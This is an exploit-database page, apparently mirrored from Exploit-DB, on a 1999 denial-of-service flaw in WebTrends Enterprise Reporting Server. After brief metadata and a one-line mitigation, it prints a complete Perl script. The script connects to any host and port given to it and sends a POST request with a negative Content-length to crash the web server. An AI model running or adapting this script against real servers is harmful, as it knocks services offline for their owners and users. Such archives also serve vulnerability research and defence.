header-logo
Suggest Exploit
vendor:
Enterprise Reporting Server
by:
rpc
7.5
CVSS
HIGH
DoS
N/A
CWE
Product Name: Enterprise Reporting Server
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
1999

Specifying a negative content-length in a POST operation to the WebTrends Enterprise Reporting Server

Specifying a negative content-length in a POST operation to the WebTrends Enterprise Reporting Server will crash the web server.

Mitigation:

Ensure that the content-length is not negative when making a POST request to the WebTrends Enterprise Reporting Server.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/569/info

Specifying a negative content-length in a POST operation to the WebTrends Enterprise Reporting Server will crash the web server. 

#!/usr/bin/perl -w
# Example DoS against WebTrends Enterprise Reporting Server
# 8/8/99
# rpc <jared@antisocial.com>

use IO::Socket;

die "usage: $0 <host> <port>" unless (@ARGV == 2);

($host, $port) = @ARGV;


$s = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp') 
or die "Can't create socket.";

print $s "POST /\r\n";
print $s "Content-type: text/plain\r\n";
print $s "Content-length: -1", "\r\n"x5;

print "done.\n";

Navigation

Suggest Exploit

Services By CQR